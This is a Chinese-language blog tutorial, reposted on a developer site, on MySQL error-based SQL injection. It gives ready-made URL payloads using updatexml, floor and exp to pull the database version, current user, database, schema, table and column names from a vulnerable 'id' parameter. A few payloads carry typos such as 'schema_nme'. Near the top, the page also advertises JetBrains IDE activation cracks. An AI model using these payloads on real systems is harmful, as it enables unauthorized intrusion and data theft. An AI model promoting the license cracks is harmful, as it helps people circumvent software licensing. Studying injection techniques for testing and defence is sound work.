1. 全栈程序员必看首页

mysql报错注入_mysql报错注入[通俗易懂]

全栈程序员-站长 未分类 阅读 0

mysql报错注入_mysql报错注入[通俗易懂]报错注入这里主要介绍3种MySQL数据库报错注入的发法,分别是updatexml、floor和exp。1.updatexmlupdatexml的报错原理从本质上来说就是函数的报错。selectupdatexml(1,concat(0x7e,(selectversion()),0x7e),1);这里还是使用前面的例子,举出一个爆破数据库版本的样例Payload:爆破数据库版本信息?id=1’+…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

报错注入

这里主要介绍3种MySQL数据库报错注入的发法,分别是updatexml、floor和exp。

1.updatexml

updatexml的报错原理从本质上来说就是函数的报错。

select updatexml(1,concat(0x7e,(select version()),0x7e),1);

这里还是使用前面的例子,举出一个爆破数据库版本的样例Payload:

爆破数据库版本信息

?id=1′ +updatexml(1,concat(0x7e,(select version()),0x7e),1)%23

?id=1′ and updatexml(1,concat(0x7e,(select version()),0x7e),1) –+

其中0x7e是ASCII编码,解码结果。

mysql报错注入_mysql报错注入[通俗易懂]

爆破当前用户

?id=1′ and updatexml(1,concat(0x7e,(select user()),0x7e),1) –+

mysql报错注入_mysql报错注入[通俗易懂]

爆破当前使用的数据库

?id=1′ and updatexml(1,concat(0x7e,(select database()),0x7e),1) –+

mysql报错注入_mysql报错注入[通俗易懂]

爆破数据库中的库名

?id=1′ and updatexml(1,concat(0x7e,(select schema_nme from information_schema.schemata limit 0,1),0x7e),1) –+

mysql报错注入_mysql报错注入[通俗易懂]

爆破表名

?id=1′ and updatexml(1,concat(0x7e,(select table_nme from information_schema.tables where table_schema= ‘test’ limit 0,1),0x7e),1) –+

mysql报错注入_mysql报错注入[通俗易懂]

其他功能的Payload可以参照下面floor的使用方法来修改。

2.floor

爆破数据库版本信息

?id=1′ +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

mysql报错注入_mysql报错注入[通俗易懂]

爆破当前用户

?id=1′ +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

mysql报错注入_mysql报错注入[通俗易懂]

爆破当前使用的数据库

?id=1′ +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

mysql报错注入_mysql报错注入[通俗易懂]

爆破指定表的字段(下面以表名为emails举例说明)

?id=1′ +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,column_name,0x7e) from information_schema.columns where table_name=0x656d61696c73 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

mysql报错注入_mysql报错注入[通俗易懂]

注意,这里我们采用的是十六进制编码后的表名。如果想采用非十六进制编码的表名则需要添加引号,但是这时候有可能会出现单引号导致的报错。

这这里,我们只演示爆破数据库版本的Payload,关于其他Payload,可自行研究并复现。

3.exp

接下来是exp函数报错,exp()报错的本质原因是报错。我们可以在MySQL中进行。

select exp(~(select * from (select user())x));

同样使用前面的例子,Payload为。

?id=1′ and exp(~(select * from (select user())x))%23

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/187426.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • STM32之sprintf函数[通俗易懂]

    STM32之sprintf函数[通俗易懂]

    STM32之sprintf函数[通俗易懂]单片机中Sprint函数:说明1:使用该函数时必须包含stdio.h头文件,否则容易卡死程序说明2:sprintf与printf函数的区别:二者功能相似,但是sprintf函数打印到字符串中(将数值转换成对应字符串形式,就是变换成ASCALL码),而printf函数打印输出到屏幕上。在单片机中将数值转换成字符串是sprintf函数最广的用途。Sprint函数具体形式:intsp

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月29日
    32
  • java项目源码分享——适合新手练手的java项目

    java项目源码分享——适合新手练手的java项目

    java项目源码分享——适合新手练手的java项目源码下载(实例一):jsp开发完整的博研图书馆后台管理系统,不使用框架开发的,太完美了源码下载(实例二):javaWeb图书馆管理系统源码mysql版本源码下载(实例三)GitHub-uboger/LibraryManager:JAVAGUI图书馆管理系统源码下载(实例四):javaswing开发企业人事管理系统源代码下载源码下载(实例一):javaswing开发网…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月19日
    14
  • 怎么让笔记本变路由器,亲身试验可用,不用下第三方软件

    怎么让笔记本变路由器,亲身试验可用,不用下第三方软件

    怎么让笔记本变路由器,亲身试验可用,不用下第三方软件怎么让笔记本变路由器,亲身试验可用,不用下第三方软件

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月23日
    56
  • NDT配准原理_icp配准算法

    NDT配准原理_icp配准算法

    NDT配准原理_icp配准算法文章目录NDT预备知识正态分布高斯牛顿法求解非线性最小二乘NDT原理(1)目标函数(2)简化目标函数(3)数值求解(4)算法流程:(5)相比ICP的优势NDT源码解析与其在PCL应用参考资料NDT预备知识正态分布n维正态随机过程中,其概率密度函数为:p(x⃗)=1(2π)D/2∣Σ∣exp⁡(−(x⃗−μ⃗)TΣ−1(x⃗−μ⃗)2)(1)p(\vec{x})=\frac{1}{(2\pi)^{D/2}\sqrt{|\boldsymbol{\Sigma}|}}\exp\left(-\f

    全栈程序员-站长的头像 全栈程序员-站长
    2022年10月27日
    0
  • php 开发模式之工厂模式

    php 开发模式之工厂模式

    php 开发模式之工厂模式

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月25日
    16
  • risc系统服务器,RISC架构三款处理器

    risc系统服务器,RISC架构三款处理器

    risc系统服务器,RISC架构三款处理器富士通在去年8月份的HotChips24大会上发布了其Sparc架构的16核处理器Sparc64-X,与此同时,甲骨文也发布了同样为Sparc架构的16核心处理器SparcT5,IBM的Power7+也是在此次大会上发布的。HotChips24三款CPU主题演讲IBM的Power7+采用的32nm支持工艺,8核心,最高主频超过5GHz,已经在IBM大型机ZzEnterpriseEC1…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年10月22日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号